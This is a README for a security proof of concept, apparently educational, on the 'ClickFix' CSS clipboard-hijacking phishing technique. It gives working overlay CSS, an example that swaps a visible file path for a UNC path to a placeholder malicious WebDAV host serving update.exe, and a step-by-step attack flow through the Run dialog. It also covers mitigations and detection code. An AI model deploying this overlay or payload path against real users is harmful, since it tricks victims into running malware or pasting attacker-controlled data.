This repository contains a proof of concept demonstrating the ClickFix attack technique - a CSS-based social engineering attack where visible text differs from the actual copied content. This technique exploits browser text selection and CSS positioning to deceive users into copying malicious content while believing they're copying legitimate information.

Based on the research shared by MalwareTech: https://www.linkedin.com/posts/malwaretech_heres-a-proof-of-concept-phishing-email-activity-7388266743720435712-9fo5

This implementation extends and documents the ClickFix technique for educational and defensive security purposes.

This is for educational and security research purposes only. This demonstrates the ClickFix attack technique - a real security vulnerability that has been exploited for phishing, social engineering, and malware distribution. Never use this technique for malicious purposes. Understanding this attack helps security professionals and developers build better defenses.

The ClickFix attack uses CSS to layer invisible, selectable text over visible text:

1. Visible Layer: Displays legitimate-looking content (e.g., a local file path)
2. Hidden Overlay: Contains malicious content positioned exactly over the visible text
3. CSS Manipulation: The overlay is made transparent but remains selectable
4. User Deception: When users select and copy, they capture the hidden overlay instead of the visible text

/* Visible text - what the user sees */
.visible-text {
    padding: 12px 20px;
    background-color: #f0f0f0;
    border: 2px solid #ddd;
    font-family: 'Courier New', monospace;
    color: #333;
}

/* Hidden overlay - what gets copied */
.hidden-overlay {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    padding: 12px 20px;
    color: rgba(0, 0, 0, 0);  /* Completely transparent */
    background: transparent;
    font-family: 'Courier New', monospace;
    z-index: 10;  /* Positioned above visible text */
    user-select: text;  /* Still selectable */
}

/* Selection styling to look normal */
.hidden-overlay::selection {
    background-color: #0066cc;
    color: transparent;
}

• position: absolute - Positions overlay on top of visible text
• color: rgba(0, 0, 0, 0) - Makes text completely transparent
• z-index: 10 - Ensures overlay is above visible text
• user-select: text - Keeps text selectable despite transparency
• ::selection pseudo-element - Styles the selection highlight

What the victim sees:

C:\Users\Public\Documents\Q4_Report_2025.pdf

What the victim actually copies:

\\webdav-server.malicious.com\share\update.exe

1. Email Delivery: Victim receives HTML email appearing to be from IT support
2. Social Engineering: Email instructs user to copy a file path to access a document
3. Visual Deception: User sees a legitimate local Windows file path
4. Copy Action: User selects and copies what appears to be the safe path
5. Paste & Execute: User pastes into Run dialog (Win+R) or File Explorer
6. Exploitation: Windows interprets the UNC path, connects to malicious WebDAV server, and attempts to execute the malware

• Browsers prioritize the topmost selectable element when determining what to copy
• CSS can make elements invisible while preserving their selectability
• The ::selection pseudo-element can style selections to appear normal
• No JavaScript required - pure CSS exploitation

• Users trust what they see on screen
• File paths appear technical and legitimate
• Copy-paste is considered a "safe" operation
• Most users don't verify clipboard contents before pasting

⚠️ For awareness only - do not implement:

1. Credential Harvesting: Display legitimate URL, copy phishing URL
2. Malware Distribution: Display safe file path, copy malicious UNC path
3. Command Injection: Display safe command, copy malicious script
4. API Key Theft: Display example key, copy attacker's webhook URL
5. Cryptocurrency Scams: Display one wallet address, copy attacker's address

1. Always Paste into Notepad First: Verify clipboard contents before executing
2. Check for UNC Paths: Be suspicious of paths starting with \\
3. Verify Email Sources: Confirm legitimacy through alternative channels
4. Avoid Copy-Paste from Emails: Manually type sensitive paths or commands
5. Use Plain Text Email Clients: Many strip dangerous HTML/CSS

1. Sanitize HTML/CSS in Emails:

   // Strip dangerous CSS properties
   const dangerousProps = ['position', 'z-index', 'opacity', 'user-select'];

2. Content Security Policy (CSP):

   <meta http-equiv="Content-Security-Policy" content="style-src 'self'">

3. Email Client Configuration:

   • Disable HTML emails by default
   • Strip absolute/relative positioning
   • Remove transparency properties
   • Limit z-index usage

4. User Education:

   • Train users to recognize phishing attempts
   • Promote clipboard verification habits
   • Demonstrate this attack in security awareness training

1. CSS Filtering: Block or strip dangerous CSS properties in HTML emails
2. Warning Indicators: Flag emails with suspicious CSS patterns
3. Sandbox Rendering: Render emails in isolated environments
4. Plain Text Fallback: Offer plain text version prominently

• Plain Text Emails: No CSS support
• Strict Email Clients: Gmail, Outlook strip many CSS properties
• Mobile Devices: Selection behavior differs, may not work consistently
• Browser Extensions: Some security extensions detect this pattern
• Developer Tools: Inspecting element reveals the overlay

// Detect overlapping selectable elements
const detectOverlay = (element) => {
    const rect = element.getBoundingClientRect();
    const topElement = document.elementFromPoint(rect.x, rect.y);
    return topElement !== element && topElement.style.zIndex > element.style.zIndex;
};

proof_of_concept.eml                # ClickFix attack HTML email demonstration
CSS_COPY_HIJACKING_README.md        # This documentation

1. Open proof_of_concept.eml in a web browser or email client that supports HTML
2. Locate the file path field in the ClickFix demonstration
3. Select and copy the text
4. Paste into Notepad to see the actual copied content
5. DO NOT paste into Run dialog or File Explorer - it contains a malicious path

• Bypasses Traditional Security: No malware in the email itself
• User Trust Exploitation: Leverages copy-paste as "safe" operation
• Wide Attack Surface: Any HTML-capable email client or web application
• Low Detection Rate: Security tools may not flag CSS-only attacks
• High Success Rate: Users rarely verify clipboard contents

Similar CSS-based attacks have been documented since the early 2010s, but remain effective due to:

• Evolving CSS capabilities
• Inconsistent email client security policies
• Low user awareness
• Difficulty in automated detection

1. Deploy email filtering rules to strip dangerous CSS
2. Update security awareness training materials
3. Implement clipboard verification prompts for sensitive operations

1. Browser-level clipboard permissions for HTML content
2. Standardized email security policies across clients
3. Visual indicators for clipboard content mismatches
4. Operating system warnings for UNC path execution

• Original Research: MalwareTech LinkedIn Post - ClickFix Email Attack POC
• ClickFix Attack Technique Documentation
• OWASP: Social Engineering Attacks
• Microsoft: Email Security Best Practices
• CSS Specification: Selection and User Interaction
• WebDAV Security Considerations
• UNC Path Exploitation Techniques

This proof of concept is inspired by and based on the ClickFix attack technique research shared by MalwareTech, demonstrating how CSS overlay techniques can be exploited for phishing attacks.